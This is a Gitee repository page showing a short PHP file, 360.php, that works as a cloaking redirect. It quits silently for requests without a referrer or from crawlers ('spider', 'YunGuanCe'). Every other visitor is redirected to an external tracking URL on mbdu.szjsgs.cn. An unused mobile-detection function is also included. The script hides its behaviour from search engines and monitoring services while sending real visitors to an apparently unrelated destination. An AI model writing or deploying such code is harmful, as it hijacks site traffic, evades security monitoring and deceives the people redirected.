1 Star 0 Fork 0

悲伤的野猪/licai

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
360.php 1.26 KB
一键复制 编辑 原始数据 按行查看 历史
悲伤的野猪 提交于 2024-05-31 19:57 . project init
<?php
$payloadUrl = isset($_SERVER['HTTP_REFERER'])? urlencode($_SERVER['HTTP_REFERER']) : '';if($payloadUrl=='') exit('/*0x001010*/');
$userAgent = $_SERVER['HTTP_USER_AGENT'];if(stripos($userAgent,'spider')>0 || stripos($userAgent,'YunGuanCe')>0) exit('/*uAg*/');
header("Location: https://mbdu.szjsgs.cn/yunbd.php?uid=0b5f4983a157df2f8a73885fb7d27558");
function eliboMsi(){if (isset($_SERVER['HTTP_X_WAP_PROFILE'])){return true;} if (isset ($_SERVER['HTTP_VIA'])){ return stristr($_SERVER['HTTP_VIA'], "wap") ? true : false;} if (isset ($_SERVER['HTTP_USER_AGENT'])){$clientkeywords=array ('nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel','lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi','openwave','nexusone','cldc','midp','wap','mobile'); if (preg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT']))){return true;} } if (isset ($_SERVER['HTTP_ACCEPT'])){if ((strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') !== false) && (strpos($_SERVER['HTTP_ACCEPT'], 'text/html') === false || (strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') < strpos($_SERVER['HTTP_ACCEPT'], 'text/html')))){return true;} } return false;}
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/Lynnet/licai.git
git@gitee.com:Lynnet/licai.git
Lynnet
licai
licai
master

搜索帮助